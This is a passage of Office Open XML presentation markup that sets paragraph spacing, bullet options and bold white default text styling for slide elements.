            <a:spcPts val="0"/>
          </a:spcAft>
          <a:buClrTx/>
          <a:buSzTx/>
          <a:buFontTx/>
          <a:buNone/>
          <a:tabLst/>
          <a:defRPr b="1" baseline="0" cap="none" i="0" spc="0" strike="noStrike" sz="3400" u="none" kumimoji="0" normalizeH="0">
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>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5C15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50000"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPts val="0"/>
          </a:spcBef>
          <a:spcAft>
            <a:spcPts val="0"/>
          </a:spcAft>
          <a:buClrTx/>
          <a:buSzTx/>
          <a:buFontTx/>
          <a:buNone/>
          <a:tabLst/>
          <a:defRPr b="1" baseline="0" cap="none" i="0" spc="0" strike="noStrike" sz="3400" u="none" kumimoji="0" normalizeH="0">
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>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